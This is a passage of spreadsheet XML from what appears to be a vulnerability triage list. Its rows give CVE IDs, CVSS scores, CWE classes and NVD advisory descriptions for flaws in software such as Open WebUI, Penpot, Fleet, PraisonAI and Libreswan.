      <c r="B433" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C433" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87996</t>
        </is>
      </c>
      <c r="D433" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E433" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F433" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G433" s="5" t="inlineStr"/>
      <c r="H433" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I433" s="5" t="inlineStr"/>
      <c r="J433" s="5" t="inlineStr"/>
      <c r="K433" s="5" t="inlineStr">
        <is>
          <t>openwebui:open_webui</t>
        </is>
      </c>
      <c r="L433" s="5" t="inlineStr"/>
      <c r="M433" s="5" t="inlineStr"/>
      <c r="N433" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O433" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P433" s="5" t="inlineStr"/>
      <c r="Q433" s="5" t="inlineStr">
        <is>
          <t>CWE-367, CWE-918</t>
        </is>
      </c>
      <c r="R433" s="5" t="inlineStr">
        <is>
          <t>Open WebUI is an extensible, feature-rich, and user-friendly self-hosted AI platform. From 0.9.6 until 0.11.1, SafePlaywrightURLLoader in backend/open_webui/retrieval/web/utils.py validated a user-controlled hostname in Python and then let the Playwright browser resolve it again in the sync and async request interceptors. An authenticated user controlling authoritative DNS could return a public address to validation and an internal address to the browser, exposing responses from internal services or cloud metadata through web search or URL ingestion. This issue is fixed in version 0.11.1.</t>
        </is>
      </c>
      <c r="S433" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87996</t>
        </is>
      </c>
    </row>
    <row r="434">
      <c r="A434" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B434" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C434" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-38822</t>
        </is>
      </c>
      <c r="D434" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E434" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F434" s="5" t="inlineStr">
        <is>
          <t>cve@mitre.org</t>
        </is>
      </c>
      <c r="G434" s="5" t="inlineStr"/>
      <c r="H434" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I434" s="5" t="inlineStr"/>
      <c r="J434" s="5" t="inlineStr"/>
      <c r="K434" s="5" t="inlineStr"/>
      <c r="L434" s="5" t="inlineStr"/>
      <c r="M434" s="5" t="inlineStr"/>
      <c r="N434" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O434" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="P434" s="5" t="inlineStr"/>
      <c r="Q434" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R434" s="5" t="inlineStr">
        <is>
          <t>In openNDS before 11.0.0, the client_params.sh script, invoked by the openNDS daemon to serve the authenticated client status page, is vulnerable to OS command injection through crafted HTTP GET query parameter keys. An authenticated captive portal user can inject arbitrary shell commands by embedding semicolons in a URL query parameter name.</t>
        </is>
      </c>
      <c r="S434" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-38822</t>
        </is>
      </c>
    </row>
    <row r="435">
      <c r="A435" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B435" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C435" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47666</t>
        </is>
      </c>
      <c r="D435" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E435" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F435" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G435" s="5" t="inlineStr"/>
      <c r="H435" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I435" s="5" t="inlineStr"/>
      <c r="J435" s="5" t="inlineStr"/>
      <c r="K435" s="5" t="inlineStr"/>
      <c r="L435" s="5" t="inlineStr"/>
      <c r="M435" s="5" t="inlineStr"/>
      <c r="N435" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O435" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="P435" s="5" t="inlineStr"/>
      <c r="Q435" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R435" s="5" t="inlineStr">
        <is>
          <t>Penpot is an open-source design and prototyping platform. In versions up to and including 2.14.3, Penpot is vulnerable to stored cross-site scripting through custom font family names, which are interpolated into a @font-face CSS rule and injected into the page as HTML without sanitization. Because the backend accepts an arbitrary font-family string and the frontend writes the resulting style through innerHTML, a name containing markup such as a closing style tag followed by a script can break out of the style element and execute JavaScript on the Penpot origin. The attack is passive: any team member who opens a file referencing the malicious font triggers script execution simply by rendering the page, allowing theft of session cookies, actions performed as the victim, and access to their files and projects. This issue is fixed in version 2.15.3.</t>
        </is>
      </c>
      <c r="S435" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47666</t>
        </is>
      </c>
    </row>
    <row r="436">
      <c r="A436" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B436" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C436" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53635</t>
        </is>
      </c>
      <c r="D436" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E436" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F436" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G436" s="5" t="inlineStr"/>
      <c r="H436" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I436" s="5" t="inlineStr"/>
      <c r="J436" s="5" t="inlineStr"/>
      <c r="K436" s="5" t="inlineStr"/>
      <c r="L436" s="5" t="inlineStr"/>
      <c r="M436" s="5" t="inlineStr"/>
      <c r="N436" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O436" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="P436" s="5" t="inlineStr"/>
      <c r="Q436" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R436" s="5" t="inlineStr">
        <is>
          <t>Open edX Platform enables the authoring and delivery of online learning at any scale. Prior to commit 59bb6d6, the view function set_course_mode_price() at lms/djangoapps/instructor/views/instructor_dashboard.py:430 is decorated only with @login_required and performs no course-level permission check. Any authenticated user — including a learner account with zero course roles — can issue a single POST request to overwrite the honor mode price and currency of any course on the platform. The companion frontend modal was removed in a prior cleanup, but the URL route and view remain live, making this an unguarded orphan endpoint. This issue has been patched via commit 59bb6d6.</t>
        </is>
      </c>
      <c r="S436" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53635</t>
        </is>
      </c>
    </row>
    <row r="437">
      <c r="A437" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B437" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C437" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54245</t>
        </is>
      </c>
      <c r="D437" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E437" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F437" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G437" s="5" t="inlineStr"/>
      <c r="H437" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I437" s="5" t="inlineStr"/>
      <c r="J437" s="5" t="inlineStr">
        <is>
          <t>okta</t>
        </is>
      </c>
      <c r="K437" s="5" t="inlineStr"/>
      <c r="L437" s="5" t="inlineStr"/>
      <c r="M437" s="5" t="inlineStr"/>
      <c r="N437" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O437" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="P437" s="5" t="inlineStr"/>
      <c r="Q437" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="R437" s="5" t="inlineStr">
        <is>
          <t>Fleet is an open-source device management platform built on osquery. In versions prior to 4.86.2, the Okta conditional access integration in Fleet Premium is vulnerable to SQL injection through a host-supplied value that is used in a database query without proper parameterization, allowing an attacker who controls a single enrolled host to read or modify arbitrary data in the Fleet database. The value is reported by the host's own agent and stored verbatim, then used on an unauthenticated request path that supports the conditional access integration, so any party controlling one enrolled host, the lowest-privilege position in the product, can influence the query. By disclosing arbitrary database contents an attacker can extract stored session tokens and replay them to act as a global administrator, and on a managed fleet that administrator access enables running scripts on enrolled hosts, leading to remote code execution. The issue requires Fleet Premium with the Okta conditional access integration enabled and does not affect instances where it is not configured. This issue is fixed in version 4.86.2.</t>
        </is>
      </c>
      <c r="S437" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54245</t>
        </is>
      </c>
    </row>
    <row r="438">
      <c r="A438" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B438" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C438" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55532</t>
        </is>
      </c>
      <c r="D438" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E438" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F438" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G438" s="5" t="inlineStr"/>
      <c r="H438" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I438" s="5" t="inlineStr"/>
      <c r="J438" s="5" t="inlineStr"/>
      <c r="K438" s="5" t="inlineStr"/>
      <c r="L438" s="5" t="inlineStr"/>
      <c r="M438" s="5" t="inlineStr"/>
      <c r="N438" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O438" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P438" s="5" t="inlineStr"/>
      <c r="Q438" s="5" t="inlineStr">
        <is>
          <t>CWE-346, CWE-352</t>
        </is>
      </c>
      <c r="R438" s="5" t="inlineStr">
        <is>
          <t>PraisonAI is a multi-agent teams system. Prior to praisonai 4.6.58, MCP HTTP Stream _validate_origin uses request_origin.startswith(allowed), allowing the attacker-controlled localhost.attacker.com HTTP origin to satisfy the localhost allowlist. A webpage can send Content-Type: text/plain requests without preflight and invoke tools/call without an API key, including file writes that persist agent instructions. This issue is fixed in version 4.6.58.</t>
        </is>
      </c>
      <c r="S438" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55532</t>
        </is>
      </c>
    </row>
    <row r="439">
      <c r="A439" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B439" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C439" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77368</t>
        </is>
      </c>
      <c r="D439" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E439" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F439" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G439" s="5" t="inlineStr"/>
      <c r="H439" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I439" s="5" t="inlineStr"/>
      <c r="J439" s="5" t="inlineStr"/>
      <c r="K439" s="5" t="inlineStr"/>
      <c r="L439" s="5" t="inlineStr"/>
      <c r="M439" s="5" t="inlineStr"/>
      <c r="N439" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O439" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="P439" s="5" t="inlineStr"/>
      <c r="Q439" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="R439" s="5" t="inlineStr">
        <is>
          <t>SeaweedFS is a distributed storage system for files and blobs. In version 4.39, the filer's TUS resumable-upload handler checks JWT allowed_prefixes scoping only when a session is created, letting a low-privilege tenant hijack another tenant's upload session to write content to filer paths their own token forbids. The HEAD, PATCH, and DELETE verbs that act on an existing session by its id never verify that the session's stored target path falls within the caller's allowed prefixes, so a tenant who obtains another upload's session identifier can PATCH attacker bytes into it and, on completion, have the file land at the victim's out-of-scope path. The same token can also DELETE other tenants' sessions and HEAD them to read upload progress and size, defeating the JWT prefix isolation. This vulnerability only affects deployments that configure filer JWT signing and have TUS uploads enabled. This issue is fixed in version 4.40.</t>
        </is>
      </c>
      <c r="S439" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77368</t>
        </is>
      </c>
    </row>
    <row r="440">
      <c r="A440" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B440" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C440" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80182</t>
        </is>
      </c>
      <c r="D440" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E440" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F440" s="5" t="inlineStr">
        <is>
          <t>cve@mitre.org</t>
        </is>
      </c>
      <c r="G440" s="5" t="inlineStr"/>
      <c r="H440" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I440" s="5" t="inlineStr"/>
      <c r="J440" s="5" t="inlineStr"/>
      <c r="K440" s="5" t="inlineStr"/>
      <c r="L440" s="5" t="inlineStr"/>
      <c r="M440" s="5" t="inlineStr"/>
      <c r="N440" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O440" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P440" s="5" t="inlineStr"/>
      <c r="Q440" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R440" s="5" t="inlineStr">
        <is>
          <t>In OpenStack Keystone before 29.0.3, tokens obtained via OAuth1 access token, application credential, or trust-scoped authentication could create new long-lived credentials or authorize new delegations that persist independently of, and outlive, the credential used to obtain them. The delegation restrictions that block these operations did not consistently apply to all delegated token types, allowing an OAuth1-scoped token, for example, to create application credentials or authorize OAuth1 request tokens despite those operations being restricted for other delegated token types. All Keystone deployments that permit delegated authentication through OAuth1 access tokens, application credentials, or trusts are affected.</t>
        </is>
      </c>
      <c r="S440" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80182</t>
        </is>
      </c>
    </row>
    <row r="441">
      <c r="A441" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B441" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C441" s="5" t="inlineStr">
        <is>
          <t>CVE-2021-44319</t>
        </is>
      </c>
      <c r="D441" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E441" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F441" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G441" s="5" t="inlineStr"/>
      <c r="H441" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I441" s="5" t="inlineStr"/>
      <c r="J441" s="5" t="inlineStr"/>
      <c r="K441" s="5" t="inlineStr"/>
      <c r="L441" s="5" t="inlineStr"/>
      <c r="M441" s="5" t="inlineStr"/>
      <c r="N441" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O441" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P441" s="5" t="inlineStr"/>
      <c r="Q441" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="R441" s="5" t="inlineStr">
        <is>
          <t>Parrot AR.Drone 1 and AR.Drone 2 are vulnerable to Denial of Service. The Parrot AR.Drone platform is vulnerable to Wi-Fi deauthentication attack, allowing remote and unauthenticated attackers to disconnect drone from controller during mid-flight.</t>
        </is>
      </c>
      <c r="S441" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2021-44319</t>
        </is>
      </c>
    </row>
    <row r="442">
      <c r="A442" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B442" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C442" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-51675</t>
        </is>
      </c>
      <c r="D442" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E442" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F442" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G442" s="5" t="inlineStr"/>
      <c r="H442" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I442" s="5" t="inlineStr"/>
      <c r="J442" s="5" t="inlineStr"/>
      <c r="K442" s="5" t="inlineStr"/>
      <c r="L442" s="5" t="inlineStr"/>
      <c r="M442" s="5" t="inlineStr"/>
      <c r="N442" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O442" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="P442" s="5" t="inlineStr"/>
      <c r="Q442" s="5" t="inlineStr">
        <is>
          <t>CWE-691</t>
        </is>
      </c>
      <c r="R442" s="5" t="inlineStr">
        <is>
          <t>An issue was discovered in openRISC OR1200 commit 83ac6b. An inaccurate update of program counter (PC) values when SPR changes can lead to a Denial of Service (DoS).</t>
        </is>
      </c>
      <c r="S442" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-51675</t>
        </is>
      </c>
    </row>
    <row r="443">
      <c r="A443" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B443" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C443" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-52182</t>
        </is>
      </c>
      <c r="D443" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E443" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F443" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G443" s="5" t="inlineStr"/>
      <c r="H443" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I443" s="5" t="inlineStr"/>
      <c r="J443" s="5" t="inlineStr"/>
      <c r="K443" s="5" t="inlineStr"/>
      <c r="L443" s="5" t="inlineStr"/>
      <c r="M443" s="5" t="inlineStr"/>
      <c r="N443" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O443" s="5" t="inlineStr">
        <is>
          <t>2026-08-20</t>
        </is>
      </c>
      <c r="P443" s="5" t="inlineStr"/>
      <c r="Q443" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="R443" s="5" t="inlineStr">
        <is>
          <t>The Library Corporation LS2 Admin v5.7 to v5.8.0 was discovered to contain an information disclosure vulnerability.</t>
        </is>
      </c>
      <c r="S443" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-52182</t>
        </is>
      </c>
    </row>
    <row r="444">
      <c r="A444" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B444" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C444" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-61478</t>
        </is>
      </c>
      <c r="D444" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E444" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F444" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G444" s="5" t="inlineStr"/>
      <c r="H444" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I444" s="5" t="inlineStr"/>
      <c r="J444" s="5" t="inlineStr"/>
      <c r="K444" s="5" t="inlineStr"/>
      <c r="L444" s="5" t="inlineStr"/>
      <c r="M444" s="5" t="inlineStr"/>
      <c r="N444" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O444" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="P444" s="5" t="inlineStr"/>
      <c r="Q444" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-830</t>
        </is>
      </c>
      <c r="R444" s="5" t="inlineStr">
        <is>
          <t>An issue in Vanderbilt Industries, Acre Security SPC5300.000 Main Board v.3.14.1 allows a physically proximate attacker to cause a denial of service via Spoofed SYN packets.</t>
        </is>
      </c>
      <c r="S444" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-61478</t>
        </is>
      </c>
    </row>
    <row r="445">
      <c r="A445" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B445" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C445" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-61479</t>
        </is>
      </c>
      <c r="D445" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E445" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F445" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G445" s="5" t="inlineStr"/>
      <c r="H445" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I445" s="5" t="inlineStr"/>
      <c r="J445" s="5" t="inlineStr"/>
      <c r="K445" s="5" t="inlineStr"/>
      <c r="L445" s="5" t="inlineStr"/>
      <c r="M445" s="5" t="inlineStr"/>
      <c r="N445" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O445" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="P445" s="5" t="inlineStr"/>
      <c r="Q445" s="5" t="inlineStr">
        <is>
          <t>CWE-294</t>
        </is>
      </c>
      <c r="R445" s="5" t="inlineStr">
        <is>
          <t>An issue in Vanderbilt Industries, Acre Security SPC5300.000 Main Board v.3.14.1 allows a physically proximate attacker to cause a denial of service via the SPC Connect Pro software accepts replayed application-layer payloads injected into an active TCP session.</t>
        </is>
      </c>
      <c r="S445" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-61479</t>
        </is>
      </c>
    </row>
    <row r="446">
      <c r="A446" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B446" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C446" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-61480</t>
        </is>
      </c>
      <c r="D446" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E446" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F446" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G446" s="5" t="inlineStr"/>
      <c r="H446" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I446" s="5" t="inlineStr"/>
      <c r="J446" s="5" t="inlineStr"/>
      <c r="K446" s="5" t="inlineStr"/>
      <c r="L446" s="5" t="inlineStr"/>
      <c r="M446" s="5" t="inlineStr"/>
      <c r="N446" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O446" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="P446" s="5" t="inlineStr"/>
      <c r="Q446" s="5" t="inlineStr">
        <is>
          <t>CWE-294, CWE-354, CWE-362, CWE-400</t>
        </is>
      </c>
      <c r="R446" s="5" t="inlineStr">
        <is>
          <t>An issue in Vanderbilt Industries, Acre Security SPC5300.000 Main Board v.3.14.1 allows a physically proximate attacker to cause a denial of service via spoofed TCP FIN packets without validating the sequence or acknowledgment numbers.</t>
        </is>
      </c>
      <c r="S446" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-61480</t>
        </is>
      </c>
    </row>
    <row r="447">
      <c r="A447" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B447" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C447" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-14296</t>
        </is>
      </c>
      <c r="D447" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E447" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F447" s="5" t="inlineStr">
        <is>
          <t>30a5e7fb-040d-440a-8cdf-a4a2068ce72e</t>
        </is>
      </c>
      <c r="G447" s="5" t="inlineStr"/>
      <c r="H447" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I447" s="5" t="inlineStr"/>
      <c r="J447" s="5" t="inlineStr"/>
      <c r="K447" s="5" t="inlineStr"/>
      <c r="L447" s="5" t="inlineStr"/>
      <c r="M447" s="5" t="inlineStr"/>
      <c r="N447" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O447" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="P447" s="5" t="inlineStr"/>
      <c r="Q447" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="R447" s="5" t="inlineStr">
        <is>
          <t>When using the Direct XIP
update strategy, the main application image starts other cores (i.e. radio
core), based on the currently active slot without additional verification. The
MCUboot in the bare (upstream) configuration assumes that if there is at least
a single slot for each image available, the system is bootable and continues
the boot process. This may lead to a situation when MCUboot picks different
slot for different images (i.e. (a) for the main application and (b) for the
radio image), boots the main application (from slot (a)) that afterwards starts
the radio image by providing an address of the unauthenticated slot ((a)
instead of (b)).</t>
        </is>
      </c>
      <c r="S447" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-14296</t>
        </is>
      </c>
    </row>
    <row r="448">
      <c r="A448" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B448" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C448" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-14957</t>
        </is>
      </c>
      <c r="D448" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E448" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F448" s="5" t="inlineStr">
        <is>
          <t>d42dc95b-23f1-4e06-9076-20753a0fb0df</t>
        </is>
      </c>
      <c r="G448" s="5" t="inlineStr"/>
      <c r="H448" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I448" s="5" t="inlineStr"/>
      <c r="J448" s="5" t="inlineStr"/>
      <c r="K448" s="5" t="inlineStr"/>
      <c r="L448" s="5" t="inlineStr"/>
      <c r="M448" s="5" t="inlineStr"/>
      <c r="N448" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O448" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="P448" s="5" t="inlineStr"/>
      <c r="Q448" s="5" t="inlineStr">
        <is>
          <t>CWE-252, CWE-617</t>
        </is>
      </c>
      <c r="R448" s="5" t="inlineStr">
        <is>
          <t>In FIPS mode, Libreswan's add_decoded_cert() function calls CERT_ExtractPublicKey() and asserts that the result is not NULL. However, CERT_ExtractPublicKey() returns NULL when public key extraction fails, for example if the RSA exponent is set to 0. A remote attacker can send a malformed X.509 certificate in a CERT payload to trigger the assertion, causing the pluto daemon to abort and restart. Continued exploitation causes a denial of service. No remote code execution is possible. Both IKEv1 and IKEv2 are affected. The vulnerability is only exploitable when both the OS and libreswan are running in FIPS mode and at least one CA certificate is loaded. The CERT payload is processed before peer authentication, so no credentials are needed to exploit this. Configurations using only PreSharedKey (PSK) authentication with no CA certificates loaded in the NSS database are not vulnerable.</t>
        </is>
      </c>
